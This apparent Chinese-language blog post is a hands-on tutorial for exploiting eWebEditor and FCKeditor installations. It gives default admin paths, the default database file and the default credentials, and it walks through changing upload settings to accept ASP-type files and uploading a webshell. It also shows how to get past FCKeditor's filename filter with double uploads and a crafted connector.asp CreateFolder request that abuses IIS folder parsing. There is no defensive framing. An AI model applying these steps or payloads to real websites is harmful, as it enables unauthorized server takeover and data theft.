常见编辑器:ewebeditor
,fckeditor
,ckeditor
,kindeditor
…
编辑器漏洞分类:
ewebeditor
fckeditor
…
核心:编辑器地址
ewebeditor漏洞利用:
默认地址:
www.xxx.com/ewebeditor
www.xxx.com//admin/ewebeditor
www.xxx.com/admin/editor
默认后台:
/ewebeditor/admin_login.asp
/ewebeditor/admin/login.asp
默认数据库:
/ewebeditor/db/ewebeditor.mdb
默认用户密码:
admin admin888
操作步骤
找编辑器地址
找默认后台
尝试默认帐号密码登录
密码被修改尝试下载默认数据库->解密密码
登录后台
修改上传属性:添加上传类型(asaspp|asa|cer|asp;)
上传webshell
实验:
http://192.168.135.132/e/admin_style.asp?action=stylepreview&id=54
无确认按钮等情况->尝试添加样式->插入图片按钮->再次上传
编辑器版本原因:要用ie6.0 或者ietest访问
fckeditor漏洞利用:
主要与解析漏洞结合
操作步骤
图片找编辑器地址
图片组合漏洞地址
上传图片webshell
审查元素寻找webshell路径
高版本fckeditor存在过滤情况
上传文件时.
变_
,如qq.asp;.jpg ==> qq_asp;.jpg
- 突破方法1:二次上传
第一次上传:qq.asp;.jpg
==> qq_asp;.jpg
第二次上传:qq.asp;.jpg
==> qq.asp;(1).jpg
- 突破方法2:修改数据包
利用解析漏洞中:文件夹解析图片webshell的思路
editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
新建了qing.asp
文件夹
若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏
扫描二维码,分享此文章